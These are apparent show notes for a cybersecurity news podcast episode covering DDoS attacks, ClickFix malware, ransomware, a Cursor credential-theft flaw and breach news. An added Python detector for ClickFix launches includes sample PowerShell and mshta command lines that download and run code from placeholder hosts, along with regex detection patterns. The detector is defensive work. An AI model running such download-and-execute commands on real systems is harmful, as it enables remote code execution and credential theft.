Daily Cyber Threat Brief – Episode 1008
Date: November 18, 2025
Host: Dr. Gerald Auger, Simply Cyber
Main Theme:
A lively, insight-driven walk through the most critical cybersecurity news headlines shaping the threat landscape today. Dr. Auger delivers expert actionable commentary for practitioners, from technical analysts to GRC pros, blending community energy with practical advice for career growth.
Episode Overview
This episode, Dr. Gerald Auger tackles some of the largest active DDoS attacks, government site defacements, evolving malware campaigns, ransomware tactics, and the practical business impacts of breaches—all while emphasizing the ongoing cat-and-mouse dynamic between attackers and defenders, the value of real-world tabletop exercises, and practical takeaways for cybersecurity teams and leaders. The show's tone is energetic, supportive, and packed with accessible, career-friendly explanations.
Key Segments & Insights
1. Azure Hit by 500,000-IP Mirai Botnet DDoS
[12:36 - 17:47]
- Story: Microsoft Azure faced a 15.72 terabits per second DDoS from the Aisuru (Mirai-variant) botnet, comprising over 500,000 IPs. The attack peaked at 3.64 billion packets/sec; Cloudflare's previous record had already been topped by a 22.2 Tbps attack from the same botnet.
- Dr. Auger’s Insight:
- Names and origins matter – Mirai (pronounced "me-rye") is a foundational botnet whose history is well known in the industry.
- Quote: “Whoever's sitting across from you absolutely knows what Mirai is.” (13:00)
- Attack scale matters: 15,000 IPs? Meh. 500,000+ is nightmare fuel.
- Modern context: Such attacks, while disruptive, are often quickly mitigated. Not all DDoS is infrastructure-killing – 40 seconds of downtime is survivable for most, but it underscores the importance of robust business continuity plans.
- Business Takeaway: If Azure is critical to your ops, have contingency plans. "We can sustain a 40-second downtime..." (16:16)
2. Government Website Defacement – Kenya & Somalia
[17:47 - 22:13]
- Story: Kenyan gov’t sites were defaced with hate messages by a group called “PCP at Kenya.” Somalia also suffered a cyber incident impacting its e-visa system, with potential exposure for 35,000 travelers.
- Key Points:
- Defacements are less about operational impact, more about optics and psychological/socio-political impact.
- Quote: “This is a, like...burr under the saddle. It's annoying. It's, it's, it's offensive. But, you know, they could just go in and fix the website...” (18:41)
- Dr. Auger’s actionable advice: Use these low-impact but high-visibility attacks as tabletop scenarios – can your org quickly restore defaced public-facing assets? Do you know how and where your backups are?
3. Evolution Malware Campaign: “Eval” Delivers Amatera Stealer and RAT
[22:13 - 27:49]
- Story: A sophisticated campaign harnesses social engineering (“Click Fix”)—tricking users via fake captchas into launching PowerShell scripts that download info-stealing malware.
- Auger’s Analysis:
- Focus not just on the tools (stealers, RATs), but on initial infection vectors: "It's the infection you got to worry about."
- Calls for vivid end user security training, making infosec personal and visual.
- Memorable Moment: Praise for relatable infographics, paired with a promise: “I'm gonna make a Click Fix end user video...and you guys could steal it.” (23:54)
- Practical tip: Gamify phishing reporting in small/mid-size orgs ("a ticket for every true positive, draw for a prize at month-end").
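The segment above stops at the infection vector: a fake captcha talks the user into pasting a PowerShell one-liner into the Run dialog or a terminal. As an added example (not from the episode or Simply Cyber), the Python below triages process-creation telemetry for that pattern on the blue-team side. Field names follow Sysmon event 1 (Image, ParentImage, CommandLine), every log line is constructed here, the example.invalid URLs are placeholders, and the indicator weights and threshold are an assumption for illustration rather than a published detection rule.

```python
"""Heuristic triage of process-creation events for ClickFix-style launches.

A ClickFix lure ends with the victim running a pasted command, so the
telemetry usually shows explorer.exe spawning powershell.exe or mshta.exe
with a hidden window and a download-and-execute command line.  Field names
mimic Sysmon event 1; all sample events below are constructed.
"""
import base64
import json
import re

# Script hosts worth scoring; anything else is ignored.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Run-dialog and desktop launches show up with this parent process.
USER_LAUNCHERS = {"explorer.exe"}

# (name, pattern, weight) -- weights are an assumption made for this example.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download_cradle", re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|\bhttps?://", re.I), 2),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I), 2),
    ("policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 1),
]
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
THRESHOLD = 4


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    indicators above can also match inside it."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not a real encoded command
        return cmdline
    return cmdline + " " + decoded


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    if image not in SCRIPT_HOSTS:
        return 0, []
    text = expand_encoded(event["CommandLine"])
    score, names = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            names.append(name)
    if parent in USER_LAUNCHERS:  # a script host launched straight from the desktop/Run box
        score += 2
        names.append("launched_from_" + parent)
    return score, names


def load_events(lines):
    return [json.loads(line) for line in lines]


def scan(events, threshold=THRESHOLD):
    """Return the events whose score reaches the threshold, with their evidence."""
    hits = []
    for event in events:
        score, names = score_event(event)
        if score >= threshold:
            hits.append({"image": basename(event["Image"]), "user": event.get("User", "?"),
                         "score": score, "indicators": names})
    return hits


def _encoded(ps):  # only used to build the constructed sample below
    return base64.b64encode(ps.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample telemetry: two benign launches, three ClickFix-shaped ones.
SAMPLE_LOG = [
    json.dumps({"Image": PS, "ParentImage": EXPLORER, "User": "CORP\\alice", "CommandLine": "powershell.exe"}),
    json.dumps({"Image": PS, "ParentImage": EXPLORER, "User": "CORP\\bob",
                "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iwr http://example.invalid/ok -UseBasicParsing | iex"'}),
    json.dumps({"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": EXPLORER, "User": "CORP\\carol",
                "CommandLine": "mshta.exe http://example.invalid/captcha.hta"}),
    json.dumps({"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "CORP\\svc_backup",
                "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"}),
    json.dumps({"Image": PS, "ParentImage": EXPLORER, "User": "CORP\\dave",
                "CommandLine": "powershell.exe -nop -w hidden -enc " + _encoded(
                    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")}),
]

if __name__ == "__main__":
    for hit in scan(load_events(SAMPLE_LOG)):
        print(hit)
```

Scoring rather than single-pattern matching is what keeps the scheduled backup script (execution-policy bypass from cmd.exe, score 1) and the analyst's interactive shell (plain powershell.exe from explorer.exe, score 2) out of the alert queue while the hidden-window download cradles and the remote .hta launched from the desktop are surfaced; decoding the -enc payload matters because the cradle is otherwise invisible in the raw command line.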
4. New Ransomware & Defender Evasion Tactics – Kraken
[27:49 - 33:49]
- Story: Cisco Talos attributes novel behaviors to the Kraken ransomware—targeting Windows, Linux, ESXi; benchmarking each victim to optimize encryption speed vs. detection; leveraging Cloudflare for persistence and SSHFS for exfil.
- Key Quotes:
- “In the world of cybersecurity, we have jobs and we get paid decently because of threat actors. If threat actors didn’t exist, probably two thirds of us wouldn’t have jobs.” (30:30)
- “This is an evolution...cat and mouse game of the ransomware space.” (33:10)
- Actionable Advice:
- Blue Teams: Test your defensive stack with current ransomware variants—especially as threat actors adapt to defensive triggers.
- Note: Cloudflare’s own outages gave rise to jokes about attacker infra reliability!
5. AI Development Environment (“Cursor”) Bug Enables Credential Theft
[38:37 - 45:14]
- Story: Knostic researchers expose how the AI-powered dev tool Cursor can be used to hijack internal browsers and steal developer credentials via unvalidated MCP servers.
- Dr. Auger’s Take:
- AI-generated coding tools (“Vibe coding”) increase the attack surface when security isn’t integral.
- “These platforms that can vibe code...are littered with OWASP top 10 vulnerabilities because it’s a software engineer, not a security professional.” (39:15)
- Recommends extreme diligence vetting all external integrations/extensions.
- Practical GRC Point: This hazard is comparable to poisoned npm/PyPI/GitHub libraries—developer workflow supply chain risks.
6. Overconfidence vs. Cyber Readiness
[45:14 - 50:00]
- Story: Immersive’s report finds cyber teams are “overconfident but underprepared”—22% average accuracy in tabletop exercises, slow response to simulated breaches, and readiness plateauing since 2023.
- Auger’s Emotional/Practical Guidance:
- Tabletop exercises must challenge all team members; avoid “let Kevin handle it” syndrome.
- Quote: “Overconfidence is a killer. Oh hey, what happens if we get hit with ransomware? Oh, we’ll just restore from backups, no big deal.” (46:04)
- Remove ego and passion—objectively expose and fix both knowledge and process gaps.
- Special Note for Newcomers: “If you are younger or you’re only a couple years in...when you say 'oh, ransomware,' the person who’s been there 30 years...might say, 'we’d just restore from backups'—learn to let that slide off you, be objective.”
7. Princeton Database Breached
[50:00 - 53:23]
- Story: Attacker accessed a large database of alumni, faculty, and donor info (not including SSN or student records) for under 24 hours.
- Analysis:
- Ivy League donors = high-value targets (“straight cash, homie”).
- Princeton must deal with donor fallout and crisis comms, even if SSNs weren’t exposed.
- “This is less about Princeton University and more about straight cash, homie...” (50:33)
8. DoorDash Email Spoofing Flaw: Bug Bounty Controversy
[53:23 - 58:44]
- Story: A security researcher found a critical flaw allowing anyone to send branded DoorDash emails (for 15+ months); DoorDash only fixed it after public pressure, then accused the researcher of extortion and banned him from its bug bounty program.
- Dr. Auger’s Take:
- Responsible disclosure should be praised, not punished.
- Quote: “If you run a bug bounty program, you have to pay your security researchers. It’s such an ugly ass look to not.” (56:55)
- Organizational lesson: Don’t antagonize your hacker community—they’re invaluable allies.
- “I can’t stand businesses that spend a dime to save a nickel...” (57:35)
9. CISA Hiring Spree to Rebuild Cyber Workforce
[58:44 - 59:30]
- Story: CISA plans to urgently hire after a ~40% vacancy in key roles, focusing on state and regional advisors, using more flexible work and academic pipelines.
- Community Impact:
- Great news for job seekers—possibly hundreds of openings.
- Contextual irony: agencies cut and then rehire, but the move is pragmatic for cybersecurity, where defenders cannot afford to fall behind threats for long.
Notable Quotes & Memorable Moments
- Dr. Auger on the scale of DDoS attacks: “I don’t get out of bed for less than a hundred thousand IPs. Like, what are you doing?” (14:43)
- On end user awareness and culture: “I’m gonna make a Click Fix end user video...you could steal it. I’m gonna literally make it accessible so it can be stolen. And you could slap your own company logo in the corner...” (24:41)
- Crowdsourcing infosec wins: “Absolute bosses up in here at Team SC. Just sharing the wins, crushing, and really just setting the tone.” (29:12)
- Personal touch: “A lot of love in chat today. It feels good. It’s like a digital hug.” (35:00)
- Ransomware defense reality check: “When we come up with defenses, threat actors adjust and pivot and move around...it’s a cat and mouse game.” (30:30)
Timestamps – Key Segments
- Azure Mirai Botnet DDoS: 12:36–17:47
- Kenya/Somalia Gov Website Defacement: 17:47–22:13
- Eval Malware & Click Fix: 22:13–27:49
- Kraken Ransomware Evolution: 27:49–33:49
- AI Coding Tool (Cursor) Vulnerability: 38:37–45:14
- Cyber Team Overconfidence/Readiness: 45:14–50:00
- Princeton Alumni/Donor Breach: 50:00–53:23
- DoorDash Email Spoof Flaw/Bug Bounty drama: 53:23–58:44
- CISA Hiring Spree: 58:44–59:30
Takeaways & Action Points
- Stay crimeware-aware: The scale and speed of DDoS attacks keep rising; understand your “critical infrastructure” dependencies and incident plans.
- Make end user training actionable and relatable: Use real screenshots, gamification, and encourage direct reporting of phishing/“Click Fix” scams.
- Emphasize tabletop exercises: Remove hierarchy and ego; objectively walk through real scenarios, ensuring backups and processes are actually understood at the technical level.
- Monitor third-party supply chain risk if you use AI dev tools or third-party libraries.
- Bug bounty programs are most effective with transparent, fair, and supportive relationships with researchers.
- Job seekers: Eyes open for new public sector opportunities—CISA’s hiring spree is great news.
Dr. Jerry’s final words:
Public accountability: “I’m going to be making an end user awareness training video that you can steal...I will literally make it so you can steal it and make it for your business.” (1:00:42)
For more insights and community support, catch the Daily Cyber Threat Brief live on weekday mornings at simplycyber.io/streams.
